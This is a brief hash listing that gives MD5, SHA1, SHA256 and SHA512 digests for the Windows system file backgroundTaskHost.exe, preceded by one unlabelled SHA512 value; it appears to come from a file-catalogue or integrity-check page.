SHA512 9f1869acd9437f74f1b581e5256a2186b9e24c4e68984e58493224c0e575865d48175f14ec2255948d1dc0c79212c272b9ad514466f21bdcfe98b1d7d5f25798

C:\Windows\System32\backgroundTaskHost.exe

MD5 da7063b17dbb8bbb3015351016868006
SHA1 c6e63c7aae9c4e07e15c1717872c0c73f3d4fb09
SHA256 20330d3ca71d58f4aeb432676cb6a3d5b97005954e45132fb083e90782efdd50
SHA512 16a8e5aad8900cb2da6d2e06258563eff56b4022092a750c16da50496ec490d1b761d630135cdf313c0ef96d6f30cce09df9ebca0de96e854f2f901b34fd9d1f